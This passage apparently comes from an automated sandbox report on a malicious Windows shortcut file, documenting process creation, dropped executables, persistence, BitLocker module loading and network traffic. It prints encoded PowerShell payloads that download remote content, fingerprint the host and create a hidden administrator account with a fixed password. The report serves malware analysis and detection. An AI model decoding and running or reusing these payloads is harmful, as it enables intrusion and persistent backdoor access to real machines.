JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline"Jump to behavior
      Source: svczHost.exe.10.drStatic PE information: section name: .managed
      Source: svczHost.exe.10.drStatic PE information: section name: hydrated
      Source: myRdpService.exe.17.drStatic PE information: section name: .managed
      Source: myRdpService.exe.17.drStatic PE information: section name: hydrated
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217FAC push edi; iretd 2_2_00007FFCCF217FAD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217F9C push edi; iretd 2_2_00007FFCCF217F9D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217F8C push edi; iretd 2_2_00007FFCCF217F8D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217F7C push edi; iretd 2_2_00007FFCCF217F7D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217FEC push edi; iretd 2_2_00007FFCCF217FED
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218FEE push edi; iretd 2_2_00007FFCCF2190CD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218FEE push edi; iretd 2_2_00007FFCCF2190DD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217FDC push edi; iretd 2_2_00007FFCCF217FDD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218FDE push edi; iretd 2_2_00007FFCCF218FED
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217FCC push edi; iretd 2_2_00007FFCCF217FCD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218FCE push edi; iretd 2_2_00007FFCCF218FDD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217FBC push edi; iretd 2_2_00007FFCCF217FBD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218FBE push edi; iretd 2_2_00007FFCCF218FCD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21802C push edi; iretd 2_2_00007FFCCF21802D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21801C push edi; iretd 2_2_00007FFCCF21801D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21800C push edi; iretd 2_2_00007FFCCF21800D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217FFC push edi; iretd 2_2_00007FFCCF217FFD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21806C push edi; iretd 2_2_00007FFCCF21806D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21805C push edi; iretd 2_2_00007FFCCF21805D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21804C push edi; iretd 2_2_00007FFCCF21804D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF21803C push edi; iretd 2_2_00007FFCCF21803D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217EB3 push edi; iretd 2_2_00007FFCCF217EB5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218EB6 push edi; iretd 2_2_00007FFCCF218EC5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217EA3 push edi; iretd 2_2_00007FFCCF217EA5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218EA6 push edi; iretd 2_2_00007FFCCF218EB5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218EA6 push edi; iretd 2_2_00007FFCCF218EC5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217E92 push edi; iretd 2_2_00007FFCCF217E95
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217E82 push edi; iretd 2_2_00007FFCCF217E85
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF218E86 push edi; iretd 2_2_00007FFCCF218E75
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217EF4 push edi; iretd 2_2_00007FFCCF217EF5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFCCF217EE4 push edi; iretd 2_2_00007FFCCF217EE5

      Persistence and Installation Behavior

      barindex
      Windows shortcut file (LNK) starts blacklisted processes
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 8008
      Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
